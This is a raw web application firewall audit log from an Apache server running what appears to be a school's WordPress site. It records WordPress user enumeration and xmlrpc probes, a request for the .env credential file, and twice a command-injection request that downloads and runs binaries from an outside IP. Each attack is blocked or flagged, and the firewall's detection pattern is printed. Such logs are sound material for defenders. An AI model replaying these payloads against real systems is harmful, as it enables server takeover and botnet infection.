Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --46f2e361-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46f2e361-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323789530131 2940 (- - -) Stopwatch2: 1746323789530131 2940; combined=1287, p1=470, p2=786, p3=0, p4=0, p5=30, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46f2e361-Z-- --a851015f-A-- [04/May/2025:08:56:36 +0700] aBbJVGJEE9ao5dcyYWnukQAAAJE 103.236.140.4 35372 103.236.140.4 8181 --a851015f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a851015f-C-- demo.sayHello --a851015f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a851015f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323796915371 5086 (- - -) Stopwatch2: 1746323796915371 5086; combined=3796, p1=462, p2=3120, p3=23, p4=27, p5=95, sr=67, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a851015f-Z-- --78eb0c05-A-- [04/May/2025:09:02:33 +0700] aBbKufnZiHJYHUAF8QfcAgAAABU 103.236.140.4 35418 103.236.140.4 8181 --78eb0c05-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --78eb0c05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78eb0c05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746324153120819 2892 (- - -) Stopwatch2: 1746324153120819 2892; combined=1257, p1=459, p2=768, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78eb0c05-Z-- --4d1e8f24-A-- [04/May/2025:09:02:40 +0700] aBbKwGJEE9ao5dcyYWnukwAAAJQ 103.236.140.4 35422 103.236.140.4 8181 --4d1e8f24-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d1e8f24-C-- demo.sayHello --4d1e8f24-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d1e8f24-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746324160211477 4981 (- - -) Stopwatch2: 1746324160211477 4981; combined=3784, p1=473, p2=3108, p3=23, p4=26, p5=90, sr=68, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d1e8f24-Z-- --216fff50-A-- [04/May/2025:09:03:13 +0700] aBbK4echPF6irSergtv89gAAANY 103.236.140.4 35428 103.236.140.4 8181 --216fff50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --216fff50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --216fff50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746324193401485 3457 (- - -) Stopwatch2: 1746324193401485 3457; combined=1506, p1=470, p2=1003, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --216fff50-Z-- --07cfff49-A-- [04/May/2025:09:03:18 +0700] aBbK5vnZiHJYHUAF8QfcBQAAAAM 103.236.140.4 35432 103.236.140.4 8181 --07cfff49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.93 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --07cfff49-C-- demo.sayHello --07cfff49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --07cfff49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746324198685549 5085 (- - -) Stopwatch2: 1746324198685549 5085; combined=3878, p1=454, p2=3200, p3=35, p4=30, p5=92, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07cfff49-Z-- --1af3d834-A-- [04/May/2025:09:22:09 +0700] aBbPUechPF6irSergtv9DwAAAMQ 103.236.140.4 35562 103.236.140.4 8181 --1af3d834-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --1af3d834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1af3d834-E-- --1af3d834-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746325329494944 2641 (- - -) Stopwatch2: 1746325329494944 2641; combined=809, p1=503, p2=267, p3=0, p4=0, p5=39, sr=102, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1af3d834-Z-- --9fb08f24-A-- [04/May/2025:09:39:21 +0700] aBbTWWJEE9ao5dcyYWnu4AAAAI4 103.236.140.4 35800 103.236.140.4 8181 --9fb08f24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.141.52 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.141.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9fb08f24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fb08f24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746326361398278 791 (- - -) Stopwatch2: 1746326361398278 791; combined=324, p1=280, p2=0, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fb08f24-Z-- --806eae2b-A-- [04/May/2025:10:04:15 +0700] aBbZL_nZiHJYHUAF8QfcMAAAAAI 103.236.140.4 36224 103.236.140.4 8181 --806eae2b-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --806eae2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --806eae2b-E-- --806eae2b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746327855240264 2403 (- - -) Stopwatch2: 1746327855240264 2403; combined=761, p1=469, p2=259, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --806eae2b-Z-- --73dcb017-A-- [04/May/2025:10:28:52 +0700] aBbe9NsVQyl9V2B8Pt-wywAAAFA 103.236.140.4 36402 103.236.140.4 8181 --73dcb017-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --73dcb017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73dcb017-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746329332980782 2954 (- - -) Stopwatch2: 1746329332980782 2954; combined=1432, p1=469, p2=932, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73dcb017-Z-- --546a0d16-A-- [04/May/2025:10:28:58 +0700] aBbe-tsVQyl9V2B8Pt-wzAAAAFI 103.236.140.4 36412 103.236.140.4 8181 --546a0d16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --546a0d16-C-- demo.sayHello --546a0d16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --546a0d16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746329338636492 5624 (- - -) Stopwatch2: 1746329338636492 5624; combined=4027, p1=532, p2=3280, p3=29, p4=31, p5=92, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --546a0d16-Z-- --e2be8a46-A-- [04/May/2025:10:30:00 +0700] aBbfOOchPF6irSergtv9YAAAAMw 103.236.140.4 36454 103.236.140.4 8181 --e2be8a46-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2be8a46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2be8a46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746329400819858 3146 (- - -) Stopwatch2: 1746329400819858 3146; combined=1382, p1=530, p2=823, p3=0, p4=0, p5=29, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2be8a46-Z-- --8134b360-A-- [04/May/2025:10:30:08 +0700] aBbfQPnZiHJYHUAF8QfcPgAAAAg 103.236.140.4 36458 103.236.140.4 8181 --8134b360-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8134b360-C-- demo.sayHello --8134b360-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8134b360-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746329408352188 6055 (- - -) Stopwatch2: 1746329408352188 6055; combined=4344, p1=625, p2=3548, p3=26, p4=27, p5=70, sr=152, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8134b360-Z-- --10175d78-A-- [04/May/2025:10:59:05 +0700] aBbmCdsVQyl9V2B8Pt-w5gAAAE8 103.236.140.4 36642 103.236.140.4 8181 --10175d78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10175d78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10175d78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746331145898434 3160 (- - -) Stopwatch2: 1746331145898434 3160; combined=1285, p1=443, p2=813, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10175d78-Z-- --502b8e52-A-- [04/May/2025:10:59:15 +0700] aBbmE9sVQyl9V2B8Pt-w6AAAAFM 103.236.140.4 36646 103.236.140.4 8181 --502b8e52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --502b8e52-C-- demo.sayHello --502b8e52-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --502b8e52-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746331155221113 5119 (- - -) Stopwatch2: 1746331155221113 5119; combined=3800, p1=478, p2=3115, p3=23, p4=25, p5=92, sr=68, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --502b8e52-Z-- --a9d4f755-A-- [04/May/2025:11:06:02 +0700] aBbnquchPF6irSergtv9dgAAAMU 103.236.140.4 36714 103.236.140.4 8181 --a9d4f755-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a9d4f755-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9d4f755-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
